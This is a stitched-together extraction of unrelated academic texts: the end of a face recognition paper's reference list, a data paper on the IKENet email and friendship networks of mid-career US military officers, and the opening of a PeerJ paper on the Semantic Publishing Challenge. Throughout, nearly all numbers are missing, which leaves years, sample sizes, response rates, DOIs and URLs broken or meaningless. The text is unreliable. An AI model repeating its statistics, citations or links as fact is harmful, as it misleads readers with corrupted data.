singh g, chhabra i. . effective and fast face recognition system using complemen- tary oclbp and hog feature descriptors with svm classifier. journal of information technology research : – . singh s, paul a, dr. arun m. . parallelization of digit recognition system using deep convolutional neural network on cuda. in: third international conference on sensing, signal processing and security (icsss). doi . /ssps. . . soltanpour s, jonathan wu qm. . high-order local normal derivative pattern (lndp) for d face recognition. in: ieee international conference on image processing (icip). piscataway: ieee doi . /icip. . . song a, li l, atalla c, cottrell gw. . learning to see faces like humans: modeling the social dimensions of faces. journal of vision ( ): doi . / . . . sun y, liang d, wang x, tang x. . deepid : face recognition with very deep neural networks. arxiv preprint. arxiv: . v : - . szegedy c, liu w, jia y, sermanet p, reed s, anguelov d, erhan d, vanhoucke v, ra- binovich a. . going deeper with convolutions. in: ieee conference on com- puter vision and pattern recognition. piscataway: ieee doi . /cvpr. . . tang h, yin b, sun y, hu y. . d face recognition using local binary patterns. signal processing ( ): – doi . /j.sigpro. . . . zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /ijfcc. .v . http://dx.doi.org/ . / - - - - _ http://arxiv.org/abs/ . v : - http://arxiv.org/abs/ ( ) - http://dx.doi.org/ . /cvpr. . http://dx.doi.org/ . / - http://dx.doi.org/ . /cp. . http://dx.doi.org/ . /acpr. . http://dx.doi.org/ . /ssps. . http://dx.doi.org/ . /icip. . http://dx.doi.org/ . / . . http://arxiv.org/abs/ . v : - http://dx.doi.org/ . /cvpr. . http://dx.doi.org/ . /j.sigpro. . . http://dx.doi.org/ . /peerj-cs. wang x, ruan q, jin y, an g. . d face recognition using closest point coordinates and spherical vector norms. in: icwmmn. doi . /cp. . . wong sc, gatt a, stamatescu v. . understanding data augmentation for classifica- tion: when to warp? ieee : – doi . /dicta. . . wu z, hou z, zhang j. . research on the d face recognition based on multi- class classifier with depth and point cloud data. in: ieee advanced information management, communicates, electronic and automation control conference (imcec), vol. . piscataway: ieee, – doi . /imcec. . . yosinski j, clune j, bengio y, lipson h. . how transferable are features in deep neural networks? in: the th international conference on neural information processing systems, vol. . – . zeiler md, fergus r. . visualizing and understanding convolutional neural networks. in: eccv lncs, . – . zhang d, zhang m, liu y. . three dimension face recognition based on gabor trans- formation and support vector machine. journal of applied science and engineering ( ): . zhang j, hou z, wu z, chen y, li w. . research of d face recognition algo- rithm based on deep learning stacked denoising autoencoder theory. in: iccsn. doi . /iccsn. . . zhu x, liu x, lei z, li sz. . face alignment in full pose range: a d total solution. arxiv preprint. arxiv: . v : - . zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /cp. . http://dx.doi.org/ . /dicta. . http://dx.doi.org/ . /imcec. . http://dx.doi.org/ . /iccsn. . http://arxiv.org/abs/ . v : - http://dx.doi.org/ . /peerj-cs. none microsoft word - volume _final insna.org | issues & | volume | ikenet: email and friendship evolution ian mcculloh abstract network evolution is an important problem for social scientists, management consultants, and social network scholars. unfortunately, few empirical data sets exist that have sufficient data to fully explore evolution dynamics. increasingly, more and more online data sets are used in lieu of offline, face-to-face data. the veracities of these findings are questionable, however, because there are few studies exploring the similarity of online-offline dynamics. the ikenet project investigated online and offline network evolution. empirical data was collected on a group of mid-career military officers going through a one-year graduate program. data collection included email communication collected from the exchange server, as well as self- reported friendship, and time spent together, over a course of weeks. numerous attribute data on the individual actors was collected from their military personnel files. the data allows network scholars to conduct research into the dynamics of network evolution and allows edu- cators a real-world example data set for use in classroom instruction. author ian mcculloh holds joint appointments as a parson’s fellow in the bloomberg school of public health, a senior lecturer in the whiting school of engineering and a senior scientist at the applied physics lab, at johns hopkins university. he is the chief technology officer for arrow analytics, a management and neural marketing consulting firm. his current research is focused on strategic influence in online networks. his most recent papers have been focused on the neuroscience of persuasion and measuring influence in online social media firestorms. he is the author of “social network analysis with applications” (wiley: ), “networks over time” (oxford: forthcoming) and has published peer-reviewed papers, primarily in the area of social network analysis. he retired as a lieutenant colonel from the us army after years of service in special operations and improvised explosive device forensics. he founded the west point network science center and created the army’s advanced network analysis and targeting (anat) program. please send all correspondence to imccull @jhu.edu connections ikenet: email and friendship evolution | volume | issues & | insna.org . overview the ikenet data is from one year of a five- year strategic study of social networks among mid-career military officers admit- ted to a one-year graduate program run jointly by columbia university and the u.s. military academy at west point. most of these students/officers serve for two to three years as tactical officers at west point following completion of their master’s degree program. tactical officers are responsible for overseeing the cadet chain of command at the u.s. military academy and for providing the primary leadership training for cadets. this data focuses on friendship formation and evolution during the first weeks of their program. the stu- dents/officers were recruited for this study on the first morning of their graduate pro- gram, prior to meeting other participants for the first time, although some subjects may have had random interaction with each other in the past. the first network survey was collected during that morning, and then weekly for the following time pe- riods. one subject out of chose not to participate in this study. the response rate on self-reported survey data among the participants was %, which creates a % overall response rate. email data was cap- tured at the exchange server, therefore that response rate is %. this presents a unique data set for exploration of friend- ship formation, multi-level network analy- sis, longitudinal network analysis, and comparison between email and face-to- face networks. . data collection social network data was collected on a group of mid-career officers in the u.s. military. the officers were all enrolled in the eisenhower leadership development program (eldp) where they complete a one-year graduate program administered jointly by columbia university and the u.s. military academy. social networks included self-reported friendship, time spent together, and email communication collected from the central email exchange server (ring et al., ). data was col- lected beginning on the first day that the officers reported for duty and met each other for the first time. they were all given blackberries that allowed them to be con- nected to their military email accounts to facilitate email communication for the purpose of the project. the specific year of this data is in- tentionally omitted to protect the privacy of the respondents. the “ikenet” project was conducted over five years from to . in this particular year, of of- ficers in the program consented to be par- ticipants in this project. all data from the non-consenting officer were removed to protect their privacy. the u.s. army and the west point institutional review boards approved this research. surveys were conducted on a week- ly schedule, collecting network data on friendship and time spent together for weeks. the boundary of the network was defined using a realist approach (wasser- man and faust, ; mcculloh et al., ). the boundaries in this experiment were the members of the eisenhower leadership development program (eldp). this group consisted of offic- ers. two of the officers were women and were men. one of the men was a u.s. coast guard officer, while the other of- ficers were in the u.s. army. there were caucasian officers to include the two women. three of the officers were black and one was asian. the ages of the offic- ers ranged from to , with most offic- ers aged . attribute data was collected on the participants from their officer record brief (orb). the orb contains a wealth of in- formation on the officers. six officers to include the two women were roman cath- olic. officers were of various protestant christian denominations. for the purpose of this study, they were coded as protestant. this decision was made, be- cause on military installations all protestant faiths meet in a non- ikenet: email and friendship evolution connections insna.org | issues & | volume | denominational protestant service, while roman catholics meet in a different ser- vice. therefore, it is likely that if protestant officers attend church, they are likely to attend the same church regardless of their specific denomination. one officer was buddhist, one had no preference re- ported for religion, and no data was availa- ble for the coast guard officer. several experiments have recently been run out of west point concerning the formation of email networks. two collec- tion methods identified include decentral- ized, client-side collection and a central- ized collection of messages from the mail server (ring et al., ). the ikenet stud- ies conducted at west point have demon- strated findings that favor a centralized da- ta collection method over a client-side method (mcculloh and ring, ). addi- tionally, research has been conducted on how to unobtrusively collect these net- works to reduce respondent burden (mcculloh and ring, ). the source and time of commission was also collected from the orb. nine of- ficers to include the two women were graduates of the u.s. military academy. the coast guard officer was a graduate of the coast guard academy. eight officers were commissioned through the reserve officer training corps (rotc) and the remaining three were commissioned through officer candidate school (ocs). the military tracks officer promotions and career management by year groups. there- fore, each officer’s year group was also recorded. one officer was commissioned in , in , seven in , one in , and the coast guard officer was commissioned in . another important attribute for so- cial interaction may be competence or ex- perience. the undergraduate grade point average (gpa) was collected for each of- ficer from his or her application to the graduate program. the gpa ranged from . to . with an average gpa of . and a standard deviation of . . for experi- ence, the number of months an officer spent in command was recorded from their orb. command is the “key developmental job” (kd) for a captain and is an experien- tial requirement that an officer must com- plete prior to being admitted into the eldp program. the only exception is for the coast guard officer who must meet different career milestones respective to his military branch of service. the maxi- mum time any officer spent in command was months and the minimum time was months. the average was . with a standard deviation of . . each week the officers completed two surveys: friendship and time spent to- gether. there was a % response rate among participants. with one out of of- ficers choosing not to participate, the over- all response rate was %. in the cases of non-response, the dyadic rating between the preceding and proceeding weeks did not change, so it was simple to interpolate the missing data. unfortunately, there was no indicator coded in the data for where this occurred. the missing data were ran- dom and believed to be due to oversight. given that the omission was not discov- ered for about a week and that the ratings for those omissions did not change, there was no attempt to go back to respondents to correct their response. the friendship survey question asked respondents, “please rate how well you like the other members of your eldp cohort according to the following scale:” the scale was a seven-point likert scale as follows: connections ikenet: email and friendship evolution | volume | issues & | insna.org coded rating (this is what was shown to respondents) “i strongly dislike this person” “i do not care for this person” “i am neutral toward this person” “i like this person” “this person is one of my better friends at this duty station” “this person is one of my better friends overall” “i consider this person one of my closest friends” the time spent together survey question asked respondents, “please rate the time you spend with the other members of your eldp cohort according to the fol- lowing scale:” the scale was a seven-point likert scale as follows: coded rating (this is what was shown to respondents) “i avoid this person” “i associate with this person only for official business at work” “i socialize with this person at work” “i occasionally (monthly) get together with this person outside of work” “i regularly (weekly) get together with this person outside of work” “i regularly (weekly) spend time with this person at their/my home” “i go on pass/leave [vacation] with this person” this project collected a rich group of networks surrounding mid-career army officers. three networks were col- lected from the participants: friendship, email and the time spent together. the friendship and time spent together were collected through the use of questionnaires on a weekly basis. the email network was collected at the server level and only col- lected the header information of emails (ring et al., ). . data files and formats the data are provided as flat comma sepa- rated value files. the file “attributes.csv” provides the attribute data. there are columns in this file, corresponding to dif- ferent attributes and described by the table below. column attribute description a long tour number of overseas assignments the officer has had that exceed one year b short tour number of overseas assignments the officer has had that are one year or less c commands number of command assignments the officer has had d birthplace officer’s state of birth e branch two letter designation of the officers career field f cbt tour number of combat deployments completed g kids number of children the officer lists as dependents h cmdmos number of months spent in command assignments i comm source of commission: united states military academy (us- ma), reserve officer training corps (rotc), or officer candi- date school (ocs) j followon follow-on assignment after officer finishes program ikenet: email and friendship evolution connections insna.org | issues & | volume | column attribute description k gpa undergraduate gpa on program application l gre verbal score on graduate record exam from application m gre math score on graduate record exam from application n height height, in inches o hor state listed as home of record p lang secondary language after english q lang tertiary language after english r marital marital status: single, married, or divorced s opntour number of operational deployments, not classified as combat t race caucasian (c), black (b), and asian (a) u religion religion as reported in personnel file v rest tour unknown – included in personnel file w sex sex x skill additional skill identifier to denote certain skills used in assign- ment decisions, such as paratrooper or ranger. y skill as above z skill as above aa skill as above ab skill as above ac spousebirth spouse’s location of birth ad state state of residence on record for tax purposes ae undergrad major academic major studied in undergraduate program af undergrad school name of the undergraduate academic institution ag weight officer’s weight in pounds ah yg officer’s year group, usually the year they commissioned the email network data is con- tained in files “email .csv”, “email .csv”, …, “email .csv” corre- sponding to weeks one through . each csv contains an adjacency matrix, where the elements of the matrix represent the number of email messages sent from the row element to the column element. the ordering of the rows and columns are con- sistent with the ordering of attributes in the “attributes.csv” file and with other adja- cency matrices included. the friendship network data is con- tained in files “like .csv”, “like .csv”, …, “like .csv” corresponding to weeks one through . each csv contains an adja- cency matrix, where the elements of the matrix represent the friendship rating that the row element assigns to each column el- ement. the rating follows a seven-point likert scale. subjects do not rate them- selves, so “ ” represents an n/a value. the ordering of rows and columns are con- sistent with the ordering of attributes in the “attributes.csv” file and with other adja- cency matrices included. the time spent together network data is contained in files “time .csv”, “time .csv”, …, “time .csv” corre- sponding to weeks one through . each csv contains an adjacency matrix, where the elements of the matrix represent the friendship rating that the row element as- signs to each column element. the rating follows a seven-point likert scale. sub- jects do not rate themselves, so “ ” repre- sents an n/a value. the ordering of rows and columns are consistent with the order- ing of attributes in the “attributes.csv” file and with other adjacency matrices includ- ed. connections ikenet: email and friendship evolution | volume | issues & | insna.org . data details response rate % for email networks, collected at the central server % for self-reported survey networks % for attribute data, collected from personnel files non-respondent bias none. there was no dyadic change from the data collected in the pre- ceding and following time periods for the few cases of missing data, allowing easy interpolation of data theoretical grouping n/a publication using these data none to date data context friendship formation among a group of mid-career military officers in a one-year graduate school program respondents mid-career military officers in the eisenhower leadership develop- ment program of the us army and columbia university longitudinal the first weeks of the program. temporality multiple ties are recorded between actors on a weekly basis. assign- ment cycles typically involved major assignments due every other week. analytical or pedagogical utility  longitudinal network data with time periods  multi-level networks with three relations: self-reported friend- ship, self-reported time spent together, email  network evolution, capturing data as the actors meet for the first time  node and edge covariates known issues references mcculloh, i., armstrong, h. & johnson, a.n. ( ). social network analysis with applications. hobo- ken, nj: wiley. mcculloh, i. & ring, b. ( ). unobtrusive social network data from e-mail. in proceedings, th army science conference. orlando, fl. ring, b., henderson, s., & mcculloh, i. ( ). gath- ering and studying email traffic to understand social networks. in h.r. arabnia & r.r. hashe- mi (eds.), proceedings of the international conference on information & knowledge engi- neering (pp. - ). las vegas: csrea press. wasserman, s., & faust, k. ( ). social network analysis: methods and applications (vol. ). cambridge: cambridge university press. submitted july accepted december published january corresponding author anastasia dimou, anastasia.dimou@ugent.be academic editor ana maguitman additional information and declarations can be found on page doi . /peerj-cs. copyright dimou et al. distributed under creative commons cc-by . open access challenges as enablers for high quality linked data: insights from the semantic publishing challenge anastasia dimou , , sahar vahdati , angelo di iorio , christoph lange , , ruben verborgh , and erik mannens , faculty of engineering and architecture, ghent university, ghent, belgium imec, leuven, belgium department of intelligent systems, university of bonn, bonn, germany department of computer science and engineering, university of bologna, bologna, italy enterprise information systems, fraunhofer iais, sankt augustin, germany abstract while most challenges organized so far in the semantic web domain are focused on comparing tools with respect to different criteria such as their features and competencies, or exploiting semantically enriched data, the semantic web evaluation challenges series, co-located with the eswc semantic web conference, aims to compare them based on their output, namely the produced dataset. the semantic publishing challenge is one of these challenges. its goal is to involve participants in extracting data from heterogeneous sources on scholarly publications, and producing linked data that can be exploited by the community itself. this paper reviews lessons learned from both (i) the overall organization of the semantic publishing challenge, regarding the definition of the tasks, building the input dataset and forming the evaluation, and (ii) the results produced by the participants, regarding the proposed approaches, the used tools, the preferred vocabularies and the results produced in the three editions of , and . we compared these lessons to other semantic web evaluation challenges. in this paper, we (i) distill best practices for organizing such challenges that could be applied to similar events, and (ii) report observations on linked data publishing derived from the submitted solutions. we conclude that higher quality may be achieved when linked data is produced as a result of a challenge, because the competition becomes an incentive, while solutions become better with respect to linked data publishing best practices when they are evaluated against the rules of the challenge. subjects data science, digital libraries, emerging technologies, world wide web and web science keywords linked data, semantic web, linked data publishing, semantic publishing, challenge, survey introduction the semantic web aims to extend the human-readable web by encoding the semantics of resources in a machine-comprehensible and reusable fashion. over the past years, a growing amount of research on publishing and consuming linked data, i.e., data represented and made available in a way that maximizes reusability, has facilitated semantic web adoption. however, one of the remaining issues is lack of high quality linked how to cite this article dimou et al. ( ), challenges as enablers for high quality linked data: insights from the semantic publishing challenge. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:anastasia.dimou@ugent.be https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. data. a promising means to foster and accelerate the publication of such high quality linked data is the organization of challenges: competitions during which participants complete tasks with innovative solutions that are then ranked in an objective way to determine the winner. a significant number of challenges has been organized so far, including the semantic web challenge (see http://challenge.semanticweb.org/), its big data track formerly known as the billion triples challenge, and the linkedup challenge (http://linkedup-challenge.org/), to mention a few of the longest lasting. however, these challenges targeted broad application domains and were more focused on innovative ways of exploiting semantic web enabled tools (linked data consumption) than on the output actually produced (linked data production). therefore, such challenges enable advancement of semantic web technology but overlook the possibility of also advancing linked datasets per se. this paper focuses on a series of challenges in the semantic publishing domain. semantic publishing is defined as ‘‘the enhancement of scholarly publications by the use of modern web standards to improve interactivity, openness and usability, including the use of ontologies to encode rich semantics in the form of machine-readable rdf metadata’’ by shotton ( ). the semantic publishing challenge, was themed ‘‘assessing the quality of scientific output’’ (lange & di iorio, ) ( sempub challenge, http: // .eswc-conferences.org/semantic-publishing-challenge.html), in we mentioned the techniques more explicitly by appending ‘‘... by information extraction and inter- linking’’ (di iorio et al., ) ( sempub challenge, http:// .eswc-conferences. org/important-dates/call-sempub), and in we generalized to ‘‘... in its ecosystem’’ to emphasize the multiple dimensions of scientific quality and the potential impact of producing linked data about it (dimou et al., ) ( sempub challenge, http: // .eswc-conferences.org/assessing-quality-scientific-output-its-ecosystem). according to miller & mork ( ), extracting, annotating and sharing scientific data (by which, here, we mean standalone research datasets, data inside documents, as well as metadata about datasets and documents) and then building new research efforts on them, can lead to a data value chain producing value for the scholar and semantic web community. on the one hand, the scholar community benefits from a challenge that produces data, as the challenge results in more data and in data of higher quality being available to the community to exploit. on the other hand, the semantic web community benefits: participants optimize their tools towards performance in this particular challenge, but such optimisations may also improve the tools in general. once such tools are reused, any other dataset benefits from their advancements, because the processes producing them has been improved. however, bootstrapping and enabling such value chains is not easy. in a recent publication (vahdati et al., ), we discussed lessons we learned from our experience in organizing the first two editions of the semantic publishing challenge— mainly from the perspective of how to improve the organization of further editions and of providing a better service to the scholar community. the lessons are related to the challenge organization, namely defining the tasks, building the input datasets and performing the dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://challenge.semanticweb.org/ http://linkedup-challenge.org/ http:// .eswc-conferences.org/semantic-publishing-challenge.html http:// .eswc-conferences.org/semantic-publishing-challenge.html http:// .eswc-conferences.org/important-dates/call-sempub http:// .eswc-conferences.org/important-dates/call-sempub http:// .eswc-conferences.org/assessing-quality-scientific-output-its-ecosystem http:// .eswc-conferences.org/assessing-quality-scientific-output-its-ecosystem http://dx.doi.org/ . /peerj-cs. evaluation, as well as lessons we learned by studying the solutions, with respect to the methodologies, tools and ontologies used, and data produced by the participants. we organized the third edition based on these lessons learned. in this paper, we revise our lessons learned, taking into consideration experience gained by organizing the challenge’s third edition, whose results validate in principle our lessons learned. we argue that challenges may act as enablers for the generation of higher quality linked data, because of the competitive aspect. however, organizing a successful challenge is not an easy task. therefore, the goal of this paper is to distill generic best practices, which could be applied to similar events, rendering the challenge tasks into meaningful milestones for efficient linked data generation and publishing. to achieve that, we validated the generalizability of our lessons learned against the other semantic web evaluation challenges ( semantic web evaluation challenges, http: // .eswc-conferences.org/important-dates/call-challenges.html, semantic web evaluation challenges, http:// .eswc-conferences.org/call-challenges, semantic web evaluation challenges, http:// .eswc-conferences.org/call-challenges). we concluded that our lessons learned are applicable to other challenges too; thus they can be considered best practices for organizing a challenge. other challenge organizers may benefit from relying on these best practices when organizing their own challenge. additionally, we thoroughly analyze and report best practices followed by the linked data that the solutions to our challenge’s tasks produce. our study of the different solutions provides insights regarding different approaches that address the same task, namely it acts as if the challenge benchmarks those different solutions against a common problem. last, we assess based on the produced datasets how the challenge organization reinforces increasing linked data quality in respect to the different linked data dimensions identified by zaveri et al. ( ). thus, besides the scholarly community and the ceur-ws.org open access repository, which is the owner of the underlying data, the broader linked data community may benefit from looking into our cumulative results. other linked data owners may find details on different approaches dealing with the same problem and the corresponding results they produce. taking them into consideration, they can determine their own approach for an equivalent case or even consider launching a corresponding challenge to determine the best performing tool with respect to the desired results and consider this one for their regular long term use. moreover, other linked data publishers may advise the results or consider the best practices as their guidelines for improving their tools and thus their results. in summary, our contributions are: • an outline of challenges organized in the field of linked data and semantic web technologies, • an exhaustive analysis of all solutions to every task of all editions of the semantic publishing challenge series, • a systematic discussion of lessons that we have learned from organizing the semantic publishing challenge, and • a structured set of best practices for organizing similar challenges, resulting from validating our lessons against other semantic web evaluation challenges. dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http:// .eswc-conferences.org/important-dates/call-challenges.html http:// .eswc-conferences.org/important-dates/call-challenges.html http:// .eswc-conferences.org/call-challenges http:// .eswc-conferences.org/call-challenges http://dx.doi.org/ . /peerj-cs. the remainder of the paper is structured as follows: ‘background and related work’ section reviews related work; in particular it sets the background for our study by recapitulating the semantic publishing challenges run so far and comparing them to related challenges. ‘best practices for challenge organization’ section revisits the lessons learned, taking into consideration all three editions, validates them against other challenges and concludes in best practices for organizing such challenges. ‘challenge solutions analysis’ section exhaustively and cumulatively analyses the solutions submitted to all tasks of all challenges in the series. ‘discussion: challenge impact on linked data quality’ section reviews the semantic publishing challenges as a means of assessing the quality of data, and ‘conclusions’ section summarizes our conclusions. background and related work this section sets the background of the semantic publishing challenges so far. ‘state of the art on previously organized challenges’ section summarizes other challenges, mainly those run in the semantic web community. then, ‘semantic publishing challenge: – ’ section recapitulates the semantic publishing challenges run so far, including the definitions of their tasks, and their outcomes. state of the art on previously organized challenges several related challenges were organized in the past for different purposes and application domains. in this section, we summarize the most well-known, long-lasting and closely related challenges in the semantic web field. where applicable, we report on systematic reviews of challenges for lessons learned. ontology matching challenges the ontology matching challenges (http://ontologymatching.org/) have been organized since by the ontology alignment evaluation initiative (oaei, http://oaei. ontologymatching.org/) and co-located with several top information systems and web conferences such as www (world wide web conferences, https://en.wikipedia.org/ wiki/international_world_wide_web_conference) or vldb (very large databases conferences, https://en.wikipedia.org/wiki/vldb). it aims to forge a consensus for evaluating the different emerging methods for schema or ontology matching. the oaei aims to assess the strengths and weaknesses of alignment/matching systems, compare the performance of techniques, and improve evaluation techniques to help improving the work on ontology alignment/matching through evaluating the techniques’ performances. following a similar structure as the semantic publishing challenge, the oaei challenge provides a list of test ontologies as training datasets. the seals infrastructure (http: //oaei.ontologymatching.org/ /seals-eval.html) to evaluate the results has been made available since . the results are presented during the ontology matching workshop, which is usually co-located with the international semantic web conference (iswc, http://swsa.semanticweb.org/content/international-semantic-web-conference-iswc). the tests and results of the challenge are published for further analysis. dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://ontologymatching.org/ http://oaei.ontologymatching.org/ http://oaei.ontologymatching.org/ https://en.wikipedia.org/wiki/international_world_wide_web_conference https://en.wikipedia.org/wiki/international_world_wide_web_conference https://en.wikipedia.org/wiki/vldb http://oaei.ontologymatching.org/ /seals-eval.html http://oaei.ontologymatching.org/ /seals-eval.html http://swsa.semanticweb.org/content/international-semantic-web-conference-iswc http://dx.doi.org/ . /peerj-cs. semantic web challenge the semantic web challenge (http://challenge.semanticweb.org/) aims to apply semantic web techniques in building online end-user applications that integrate, combine and deduce information needed to assist users in performing tasks. it features a track about big data designed to demonstrate approaches which can work on web scale using realistic web-quality data. the big data track, formerly known as the billion triples challenge (btc), started from mostly co-located with iswc. the billion triples challenge aimed to demonstrate the capability of semantic web technologies to process very large and messy data as typically found on the web. the track was renamed to ‘‘big data track’’ because very large data sets are now ubiquitous and the competition was opened to broader range of researchers dealing with their own big data. the functionality of submitted solutions is open but, to address real scalability issues, it forces all participants to use a specific billion triple challenge dataset provided by the challenge’s organizers. question answering over linked data (qald) the question answering over linked data (qald) challenge (http://qald.sebastianwalter. org/) (lopez et al., ; unger et al., ) focuses on answering natural language or keyword-based questions over linked datasets. co-located with the eswc semantic web conference (eswc, http://eswc-conferences.org/) in its first two editions in and , it moved to the conference and labs of the evaluation forum (clef, https://en.wikipedia.org/wiki/conference_and_labs_of_the_evaluation_forum) for the three following editions, to return to eswc as a part of its semantic web evaluation challenges track explained below. in all editions, a set of up to questions over dbpedia (https://dbpedia.org) served as input; participants were expected to answer these questions. the – editions had a task on multilingual questions, while from , a task on hybrid question answering over rdf and free text was added. some editions considered alternative datasets, e.g., about drugs or music, and had alternative sub-tasks on answering questions over interlinked datasets or finding lexicalizations of ontological terms. only few submitted solutions address the question/answering issues over a distributed and large collection of interconnected datasets. the first two editions of the qald challenge were reviewed (lopez et al., ); similarly to our work, this review ‘‘discuss[es] how the second evaluation addressed some of the issues and limitations which arose from the first one, as well as the open issues to be addressed in future competitions’’. like us, lopez et al. present the definition of the qald challenge’s tasks and the datasets used, and draw conclusions for the subsequent evaluation of question answering systems from reviewing concrete results of the first two challenge editions. their review of related work includes a review of methods for evaluating question answering systems, whereas the semantic publishing challenge was created to address the lack of such methods for evaluating semantic publishing tools (cf. ‘semantic publishing challenge: – ’). we additionally present lessons learned for challenge organization (‘best practices for challenge organization’) and about semantic publishing tools (‘challenge solutions analysis’), which, together, constitute the main contribution of this paper. dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://challenge.semanticweb.org/ http://qald.sebastianwalter.org/ http://qald.sebastianwalter.org/ http://eswc-conferences.org/ https://en.wikipedia.org/wiki/conference_and_labs_of_the_evaluation_forum https://dbpedia.org http://dx.doi.org/ . /peerj-cs. lak challenges the learning analytics and knowledge challenges (lak challenges; see http://meco.l s. uni-hannover.de: /wp /?page_id= ) use a specific dataset of structured metadata from research publications in the field of learning analytics. the challenge was organized in for the first time and has so far continued yearly with the lak conference. beyond merely publishing the data, the lak challenges encourage its innovative use and exploitation. participants submit a meaningful use case of the dataset in the scope of six topic categories, such as comparison of the lak and edm (educational data mining) communities, innovative applications to explore, navigate and visualize, enrichment of the dataset, and usage of the dataset in recommender systems. considering that a lot of information is still available only in textual form, the submitted approaches can not only deal with the specific character of structured data. the aim for further challenges is to combine solutions for processing both structured and unstructured information from distributed datasets. linkedup the linkedup challenge was run by the linkedup project (linking data for education, http: //linkedup-project.eu/) since . the main purpose of the project was to push educational organizations to make their data publicly available on the web. one of the activities towards this purpose was to organize the linkedup challenge. the three editions of the challenge focused on three different levels of maturity: demo prototypes and applications, innovative tools and applications, and mature data-driven applications. participants were asked to submit demos of tools that analyze and/or integrate open web data for educational purposes. for all the above challenges, the participants were asked to submit a scientific paper along with their tool and dataset. d’aquin et al. ( ) present lessons learned from the linkedup project (linking web data for education). however, their paper provides a summary of the outcomes of the project, including a summary of the linkedup challenge, rather than a systematically structured account of lessons learned. dialog state tracking challenge (dstc) the challenge series review that is most closely related to ours in its methodology has been carried out by williams, raux & henderson ( ) over a challenge series from a field of computer science that is related to semantics but not to the web: the dialog state tracking challenge (dstc, http://workshop.colips.org/dstc /) on ‘‘correctly inferring the state of [a] conversation [...] given all of the dialog history’’. like our review, the one of dstc is based on three editions of a challenge, each of which built on its predecessor’s results, and it presents the definition of the challenge’s tasks and the datasets used. like we do in ‘challenge solutions analysis’ section, they provide a structured overview of the submissions to the dstc challenges. however, the focus of their review is on the evolution of tools in their domain of dialog state tracking, whereas our review additionally covers lessons learned for challenge design (cf. ‘best practices for challenge organization’), besides tools in the domain of semantic publishing. dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://meco.l s.uni-hannover.de: /wp /?page_id= http://meco.l s.uni-hannover.de: /wp /?page_id= http://linkedup-project.eu/ http://linkedup-project.eu/ http://workshop.colips.org/dstc / http://dx.doi.org/ . /peerj-cs. table semantic web evaluation challenges. abbreviation challenge years sempub semantic publishing challenge , , clsa (concept-level) sentiment analysis challenge , , recsys linked open data-enabled recommender system challenge , oke open knowledge extraction challenge , saq schema-agnostic queries over linked data qald open challenge on question answering over linked data top-k top-k shortest path in large typed rdf graphs challenge other related works there are further related works and challenges that we consider out of the scope, as they are not focused on linked data sets. for example, the ai mashup challenge (http://aimashup.org/) as a part of the eswc conference focused on innovative mashups, i.e., web applications combining multiple services and datasets, that were evaluated by a jury. information retrieval campaigns are a series of comparative evaluation methods that originate from the s and are used to compare various retrieval strategies or systems. as an example of such campaigns semeval (semantic evaluation) (semeval campaigns, http: //alt.qcri.org/semeval /) is one of the ongoing series of evaluations of computational semantic analysis systems with a focus on textual similarity and question answering and sentiment analysis (clough & sanderson ( )). the computational linguistics scientific document summarization shared task (cl-scisumm) (http://wing.comp.nus.edu.sg/cl- scisumm /) is based on a corpus of annotated documents; tasks focus on correctly identifying the underlying text that a summary refers to, but also on generating summaries. semantic web evaluation challenges the semantic web evaluation challenges, including our semantic publishing challenge, aim at developing a set of common benchmarks and establish evaluation procedures, tasks and datasets in the semantic web field. they are organized as an official track of the eswc semantic web conference, which introduces common standards for its challenges, e.g., common deadlines for publishing the training and evaluation datasets. the purpose of the challenges is to showcase methods and tools on tasks common to the semantic web and adjacent disciplines, in a controlled setting involving rigorous evaluation. each semantic web evaluation challenge is briefly described here and all of them are summarized at table . concept-level sentiment analysis challenge. the concept-level sentiment analysis challenge (clsa) focuses on semantics as a key factor for detecting the sentiment of a text, rather than just performing a lexical analysis of text; cf. reforgiato recupero & cambria ( ) and reforgiato recupero, dragoni & presutti ( ). participants are asked to use semantic web technology to improve their sentiment analysis system and to measure the performance of the system (http://alt.qcri.org/semeval /task /) within the sentiment dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://aimashup.org/ http://alt.qcri.org/semeval / http://alt.qcri.org/semeval / http://wing.comp.nus.edu.sg/cl-scisumm / http://wing.comp.nus.edu.sg/cl-scisumm / http://alt.qcri.org/semeval /task / http://dx.doi.org/ . /peerj-cs. analysis track of the semeval workshop, (http://alt.qcri.org/semeval /). an automatic evaluation tool (eswc-clsa , https://github.com/diegoref/eswc-clsa) was applied to the submissions; it was made available to the participants before their submission. in the second edition, participants were asked to submit a concept-level sentiment analysis engine that exploited linked datasets such as dbpedia. linked open data-enabled recommender systems challenge. the linked open data- enabled recommender systems challenge (di noia, cantador & ostuni, ) was designed with two main goals: (i) establish links between the two communities of recommender systems and semantic web, and (ii) develop content-based recommendation systems using interlinking and other semantic web and technologies. the first edition featured three independent tasks related to a book recommendation use case. while the first edition was successful, the second edition was canceled because it had no participants. open knowledge extraction challenge. the open knowledge extraction challenge (oke) focuses on content extraction from textual data using linked data technology (nuzzolese et al., ). the challenge was divided into two sub-tasks (oke challenge , https://github.com/anuzzolese/oke-challenge- #tasks-overview) focusing on entity recognition and entity typing. the participants of the challenge were the developers of four different well-known systems in this community. the three defined tasks were focused on (a) entity recognition, linking and typing for knowledge base population, (b) entity typing for vocabulary and knowledge base enrichment and (c) web-scale knowledge extraction by exploiting structured annotation. the submissions were evaluated using two different methods: (i) using datasets for training purposes and for evaluating the performance of the submitted approaches, and (ii) establishing an evaluation framework to measure the accuracy of the systems. the applications of task and were published as web services with input/output provided in the nlp interchange format nif (http://persistence.uni-leipzig.org/nlp rdf/). schema-agnostic queries over linked data challenge. the schema-agnostic queries over linked data challenge (saq) was designed to invite schema-agnostic query approaches and systems (freitas & 